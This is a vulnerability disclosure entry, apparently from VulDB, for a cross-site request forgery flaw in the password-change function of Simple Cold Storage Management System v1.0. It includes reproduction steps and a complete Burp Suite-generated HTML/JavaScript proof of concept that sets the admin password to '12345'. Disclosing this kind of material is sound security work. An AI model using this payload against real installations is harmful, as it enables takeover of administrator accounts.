| Title | Simple Cold Storage Management System v1.0 is vulnerable to CSRF on Change password |
|---|
| Description | # Exploit Title: Simple Cold Storage Management System v1.0 - CSRF ON change password
# Exploit Author: SAHIL PRASAD
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Software Link: https://www.sourcecodester.com/php/15088/simple-cold-storage-management-system-using-phpoop-source-code.html
# Version: v1.0
# Tested on: Windows 10, Apache
Description: Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
Vulnerable Parameters:
change password
Steps:
1) Login into admin/user account
2) Now Go to profile
3) Now in Parameter password change the password
4) Hit burpsuite and capture the request
5) Generate CSRF poc and expoilt that poc in browser
6) Now got back to the site and log out and login with new password and you will get redirect to the dashboard
Payload:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/localhost\/csms\/classes\/Users.php?f=save", true);
xhr.setRequestHeader("Accept", "*\/*");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundaryg5STs5oE1IeCxjQy");
xhr.setRequestHeader("Accept-Language", "en-GB,en-US;q=0.9,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"id\"\r\n" +
"\r\n" +
"1\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"firstname\"\r\n" +
"\r\n" +
"Adminstrator\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"lastname\"\r\n" +
"\r\n" +
"Admin\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"username\"\r\n" +
"\r\n" +
"admin\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"password\"\r\n" +
"\r\n" +
"12345\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy\r\n" +
"Content-Disposition: form-data; name=\"img\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundaryg5STs5oE1IeCxjQy--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
|
|---|
| Source | ⚠️ https://github.com/jusstSahil/CSRF-/blob/main/POC |
|---|
| User | JustSahil (UID 33806) |
|---|
| Submission | 10/17/2022 20:54 (4 years ago) |
|---|
| Moderation | 10/18/2022 11:33 (15 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 211189 [SourceCodester Simple Cold Storage Management System 1.0 change password cross-site request forgery] |
|---|
| Points | 20 |
|---|